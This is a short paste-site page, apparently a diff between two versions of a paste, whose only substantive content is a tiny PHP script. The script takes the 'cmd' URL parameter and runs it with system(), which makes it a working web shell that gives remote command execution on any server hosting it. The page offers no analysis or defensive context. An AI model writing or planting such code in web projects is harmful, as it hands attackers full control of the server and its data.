From adsfasdf, 9 Years ago, written in Plain Text.
This paste is a reply to Re: Re: Re: adsf from adsfasdf - go back
Embed
Viewing differences between Re: Re: Re: adsf and Re: Re: Re: Re: adsf
<?php
echo "Run command: ".htmlspecialchars($_GET['cmd']);

system($_GET['cmd']);
?>